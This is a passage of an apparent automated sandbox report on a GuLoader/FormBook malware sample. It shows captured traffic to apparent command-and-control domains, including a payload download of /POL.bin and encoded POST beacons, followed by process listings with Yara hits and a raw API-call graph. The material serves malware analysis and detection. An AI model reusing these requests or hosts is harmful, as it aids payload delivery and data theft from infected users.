                                                                                  Data: Xb3xI=[encoded POST body omitted]
                                                                                  Sep 25, 2024 10:00:12.500317097 CEST | 1289 | OUT | Data: [encoded POST body continuation omitted]
                                                                                  Sep 25, 2024 10:00:12.500376940 CEST | 2578 | OUT | Data: [encoded POST body continuation omitted]
                                                                                  Sep 25, 2024 10:00:12.731959105 CEST | 1289 | OUT | Data: [encoded POST body continuation omitted]
                                                                                  Sep 25, 2024 10:00:12.732136011 CEST | 266 | OUT | Data: [encoded POST body continuation omitted]
                                                                                  Sep 25, 2024 10:00:12.733011007 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:12 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data: [gzip-compressed body omitted]
                                                                                  Sep 25, 2024 10:00:12.733026028 CEST | 1289 | IN | Data: [gzip-compressed body continuation omitted]
                                                                                  Sep 25, 2024 10:00:12.733040094 CEST | 1246 | IN | Data: [gzip-compressed body continuation omitted]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  86 | 192.168.11.20 | 49842 | 194.58.112.174 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:15.260222912 CEST | 553 | OUT | GET /7cy1/?Xb3xI=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 10:00:15.489531994 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:15 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  87 | 192.168.11.20 | 49843 | 38.47.207.146 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:20.834908009 CEST | 801 | OUT | POST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 10:00:21.165018082 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  88 | 192.168.11.20 | 49844 | 38.47.207.146 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:23.688252926 CEST | 821 | OUT | POST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 10:00:24.011989117 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:23 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  89 | 192.168.11.20 | 49845 | 38.47.207.146 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:26.541857958 CEST | 1289 | OUT | POST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 10:00:26.863286972 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:26 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  90 | 192.168.11.20 | 49846 | 38.47.207.146 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:29.395265102 CEST | 543 | OUT | GET /qjs8/?Xb3xI=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 10:00:29.723455906 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:29 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  91 | 192.168.11.20 | 49847 | 3.33.130.190 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:34.850064039 CEST | 816 | OUT | POST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=ZqAKhjHDqXd5rQXLnXFEuYJA4ecwdN+aGP0Z1NsdFstLRedRcBDb8CrbAkjunBzyH6Gl/pbnFSkJQWYCbdvtvI0Y3ISQdRvHkyb4xIIyyNsy1RkFoFXGSb1oc3fpnfyhKuXo7lAL2DqfIU1WmF1tD6XZJe8kQDVx1IwBPfAaWiHoUUXcYnmjskdQ7WVxOji1Ug==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  92 | 192.168.11.20 | 49848 | 3.33.130.190 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:37.491004944 CEST | 836 | OUT | POST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5FLQ+tRdD7b7CrbLEjrjBzpH6LY/o3nFSAJQXICauXu9o0a9YSOZRvHkyb4xINZyNky1gUFpg6Qe71rb3fp0PylKuW/7kMh2ACfIRJW301uaKXfNe9schMZy4cvEPExTBKTRCGGFVSHv3Bi/msZMhjuJoEJ+6nRutvzdJyQqU/FU10=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  93 | 192.168.11.20 | 49849 | 3.33.130.190 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:40.131798983 CEST | 1289 | OUT | POST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  94 | 192.168.11.20 | 49850 | 3.33.130.190 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:42.767828941 CEST | 548 | OUT | GET /phvf/?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 10:00:42.872776985 CEST | 398 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 08:00:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0="}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  0 | 192.168.11.20 | 49756 | 185.86.211.137 | 443 | 2788 | C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-25 07:54:24 UTC | 187 | OUT | GET /POL.bin HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: bestpack.ee
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-25 07:54:25 UTC | 283 | IN | HTTP/1.1 200 OK
                                                                                  Date: Wed, 25 Sep 2024 07:54:24 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Last-Modified: Wed, 25 Sep 2024 06:31:10 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 288320
                                                                                  Vary: Accept-Encoding,User-Agent
                                                                                  Content-Type: application/octet-stream


                                                                                  Target ID:0
                                                                                  Start time:03:53:56
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\UMOWA_PD.BAT.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:566'445 bytes
                                                                                  MD5 hash:D1F841D041C915F803DBE6C15B19C510
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.15206197185.0000000005014000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:03:54:15
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\UMOWA_PD.BAT.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:566'445 bytes
                                                                                  MD5 hash:D1F841D041C915F803DBE6C15B19C510
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.15388629452.00000000017D4000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:03:54:36
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe"
                                                                                  Imagebase:0x90000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:4
                                                                                  Start time:03:54:37
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\ipconfig.exe"
                                                                                  Imagebase:0x1e0000
                                                                                  File size:29'184 bytes
                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:5
                                                                                  Start time:03:54:50
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe"
                                                                                  Imagebase:0x90000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:6
                                                                                  Start time:03:55:03
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff7191e0000
                                                                                  File size:597'432 bytes
                                                                                  MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true


                                                                                    Execution Graph

                                                                                    Execution Coverage:19.6%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:18.4%
                                                                                    Total number of Nodes:1610
                                                                                    Total number of Limit Nodes:40
4933 403971 wsprintfW 4928->4933 4945 40399d 4928->4945 4929->4908 4930 4038f0 5047 406521 lstrcpynW 4930->5047 4934 40655e 21 API calls 4933->4934 4934->4928 4935 405a75 2 API calls 4935->4945 4936 405acf 2 API calls 4936->4945 4937 4039e7 SetCurrentDirectoryW 4940 4062e1 40 API calls 4937->4940 4938 4039ad GetFileAttributesW 4939 4039b9 DeleteFileW 4938->4939 4938->4945 4939->4945 4941 4039f6 CopyFileW 4940->4941 4941->4896 4941->4945 4942 405c2d 71 API calls 4942->4945 4943 4062e1 40 API calls 4943->4945 4944 40655e 21 API calls 4944->4945 4945->4896 4945->4928 4945->4933 4945->4935 4945->4936 4945->4937 4945->4938 4945->4942 4945->4943 4945->4944 4947 403a6f CloseHandle 4945->4947 4948 40687e 2 API calls 4945->4948 5050 405b04 CreateProcessW 4945->5050 4947->4896 4948->4945 4949->4877 4950->4879 4952 4067cf 5 API calls 4951->4952 4954 4034d7 4952->4954 4953 4034e1 4953->4885 4954->4953 4955 405df0 3 API calls 4954->4955 4956 4034e9 4955->4956 4957 405acf 2 API calls 4956->4957 4958 4034ef 4957->4958 4959 406040 2 API calls 4958->4959 4960 4034fa 4959->4960 4960->4885 5060 406011 GetFileAttributesW CreateFileW 4961->5060 4963 4030c2 4982 4030d2 4963->4982 5061 406521 lstrcpynW 4963->5061 4965 4030e8 4966 405e3c 2 API calls 4965->4966 4967 4030ee 4966->4967 5062 406521 lstrcpynW 4967->5062 4969 4030f9 GetFileSize 4970 4031f3 4969->4970 4988 403110 4969->4988 5063 40301e 4970->5063 4972 4031fc 4974 40322c GlobalAlloc 4972->4974 4972->4982 5075 4034b4 SetFilePointer 4972->5075 4973 40349e ReadFile 4973->4988 5074 4034b4 SetFilePointer 4974->5074 4977 40325f 4979 40301e 6 API calls 4977->4979 4978 403247 4981 4032b9 39 API calls 4978->4981 4979->4982 4980 403215 4983 40349e ReadFile 4980->4983 4986 403253 4981->4986 4982->4893 4985 403220 4983->4985 4984 40301e 6 API calls 4984->4988 4985->4974 4985->4982 4986->4982 4986->4986 4987 403290 SetFilePointer 4986->4987 4987->4982 4988->4970 4988->4973 4988->4977 4988->4982 4988->4984 4990 406915 5 API calls 4989->4990 
4991 403c07 4990->4991 4992 403c0d 4991->4992 4993 403c1f 4991->4993 5088 406468 wsprintfW 4992->5088 4994 4063ef 3 API calls 4993->4994 4995 403c4f 4994->4995 4997 403c6e lstrcatW 4995->4997 4999 4063ef 3 API calls 4995->4999 4998 403c1d 4997->4998 5080 403ec9 4998->5080 4999->4997 5002 405ef8 18 API calls 5003 403ca0 5002->5003 5004 403d34 5003->5004 5006 4063ef 3 API calls 5003->5006 5005 405ef8 18 API calls 5004->5005 5007 403d3a 5005->5007 5008 403cd2 5006->5008 5009 403d4a LoadImageW 5007->5009 5010 40655e 21 API calls 5007->5010 5008->5004 5013 403cf3 lstrlenW 5008->5013 5017 405e1d CharNextW 5008->5017 5011 403df0 5009->5011 5012 403d71 RegisterClassW 5009->5012 5010->5009 5016 40140b 2 API calls 5011->5016 5014 403da7 SystemParametersInfoW CreateWindowExW 5012->5014 5015 403dfa 5012->5015 5018 403d01 lstrcmpiW 5013->5018 5019 403d27 5013->5019 5014->5011 5015->4896 5020 403df6 5016->5020 5021 403cf0 5017->5021 5018->5019 5022 403d11 GetFileAttributesW 5018->5022 5023 405df0 3 API calls 5019->5023 5020->5015 5026 403ec9 22 API calls 5020->5026 5021->5013 5025 403d1d 5022->5025 5024 403d2d 5023->5024 5089 406521 lstrcpynW 5024->5089 5025->5019 5029 405e3c 2 API calls 5025->5029 5027 403e07 5026->5027 5030 403e13 ShowWindow 5027->5030 5031 403e96 5027->5031 5029->5019 5032 4068a5 3 API calls 5030->5032 5033 405679 5 API calls 5031->5033 5034 403e2b 5032->5034 5035 403e9c 5033->5035 5038 403e39 GetClassInfoW 5034->5038 5040 4068a5 3 API calls 5034->5040 5036 403ea0 5035->5036 5037 403eb8 5035->5037 5036->5015 5043 40140b 2 API calls 5036->5043 5039 40140b 2 API calls 5037->5039 5041 403e63 DialogBoxParamW 5038->5041 5042 403e4d GetClassInfoW RegisterClassW 5038->5042 5039->5015 5040->5038 5044 40140b 2 API calls 5041->5044 5042->5041 5043->5015 5044->5015 5045->4883 5046->4930 5047->4899 5048->4925 5049->4928 5051 405b43 5050->5051 5052 405b37 CloseHandle 5050->5052 5051->4945 5052->5051 5054 403b31 5053->5054 5055 403b23 CloseHandle 5053->5055 5091 403b5e 
5054->5091 5055->5054 5058 405c2d 71 API calls 5059 403a4c OleUninitialize 5058->5059 5059->4905 5059->4906 5060->4963 5061->4965 5062->4969 5064 403027 5063->5064 5065 40303f 5063->5065 5066 403030 DestroyWindow 5064->5066 5067 403037 5064->5067 5068 403047 5065->5068 5069 40304f GetTickCount 5065->5069 5066->5067 5067->4972 5076 406951 5068->5076 5070 403080 5069->5070 5071 40305d CreateDialogParamW ShowWindow 5069->5071 5070->4972 5071->5070 5074->4978 5075->4980 5077 40696e PeekMessageW 5076->5077 5078 406964 DispatchMessageW 5077->5078 5079 40304d 5077->5079 5078->5077 5079->4972 5081 403edd 5080->5081 5090 406468 wsprintfW 5081->5090 5083 403f4e 5084 403f82 22 API calls 5083->5084 5086 403f53 5084->5086 5085 403c7e 5085->5002 5086->5085 5087 40655e 21 API calls 5086->5087 5087->5086 5088->4998 5089->5004 5090->5083 5092 403b6c 5091->5092 5093 403b36 5092->5093 5094 403b71 FreeLibrary GlobalFree 5092->5094 5093->5058 5094->5093 5094->5094 5648 401b7c 5649 402dab 21 API calls 5648->5649 5650 401b83 5649->5650 5651 402d89 21 API calls 5650->5651 5652 401b8c wsprintfW 5651->5652 5653 402c2f 5652->5653 5661 401000 5662 401037 BeginPaint GetClientRect 5661->5662 5663 40100c DefWindowProcW 5661->5663 5665 4010f3 5662->5665 5666 401179 5663->5666 5667 401073 CreateBrushIndirect FillRect DeleteObject 5665->5667 5668 4010fc 5665->5668 5667->5665 5669 401102 CreateFontIndirectW 5668->5669 5670 401167 EndPaint 5668->5670 5669->5670 5671 401112 6 API calls 5669->5671 5670->5666 5671->5670 5672 401680 5673 402dab 21 API calls 5672->5673 5674 401687 5673->5674 5675 402dab 21 API calls 5674->5675 5676 401690 5675->5676 5677 402dab 21 API calls 5676->5677 5678 401699 MoveFileW 5677->5678 5679 4016a5 5678->5679 5680 4016ac 5678->5680 5681 401423 28 API calls 5679->5681 5682 40687e 2 API calls 5680->5682 5684 4022fb 5680->5684 5681->5684 5683 4016bb 5682->5683 5683->5684 5685 4062e1 40 API calls 5683->5685 5685->5679 5686 401503 5687 401508 5686->5687 5689 401520 5686->5689 
